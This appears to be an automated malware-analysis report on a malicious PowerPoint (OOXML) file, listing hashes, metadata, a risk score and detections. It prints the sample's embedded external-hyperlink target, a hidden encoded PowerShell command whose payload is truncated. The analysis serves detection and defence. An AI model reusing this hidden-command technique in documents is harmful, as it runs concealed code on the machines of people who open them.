Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 4d6f3fb265e8d2b2…

MALICIOUS

Office (OOXML)

File size: 31.1 KB
Created: 2020-09-29 11:18:06 UTC
Authoring application: Microsoft Office PowerPoint 16.0000
First seen: 2020-10-03
MD5: cc09904c4798badf08488ddedfa8079c
SHA-1: f71c531ad8a221bf82a5359d9979957a5bf22667
SHA-256: 4d6f3fb265e8d2b2e373d7b2398059bafd572b9f927435ecf11399e03ef15fa8
Risk Score: 68

Heuristics (2)

  • ClamAV: Xml.Exploit.External_Relationship_Abuse-9987932-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xml.Exploit.External_Relationship_Abuse-9987932-1
  • External hyperlinks (1) low OOXML_EXTERNAL_HYPERLINKS
    Document contains 1 external hyperlink — clickable URLs are stored as external relationships. First target: powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQ